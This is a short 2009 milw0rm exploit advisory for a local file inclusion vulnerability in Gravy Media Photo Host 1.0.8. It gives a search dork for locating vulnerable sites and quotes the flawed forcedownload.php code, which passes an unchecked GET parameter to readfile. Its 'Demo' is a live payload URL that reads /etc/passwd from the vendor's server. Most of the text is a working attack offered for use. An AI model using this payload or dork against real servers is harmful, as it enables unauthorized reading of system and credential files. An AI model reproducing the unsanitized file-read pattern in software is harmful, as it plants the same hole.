18 lines
No EOL
549 B
Text
18 lines
No EOL
549 B
Text
==================================================================
|
|
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
|
|
==================================================================
|
|
|
|
Vendor:http://www.gravy-media.com/
|
|
Download:register to download
|
|
Dork:"Powered by Gravy Media"
|
|
Discovered By:Lo$er
|
|
|
|
====Vulnerable code(forcedownload.php)====
|
|
27. $filename = $_GET['file'];
|
|
|
|
70. readfile("$filename");
|
|
====Demo====
|
|
|
|
http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd
|
|
|
|
# milw0rm.com [2009-06-22] |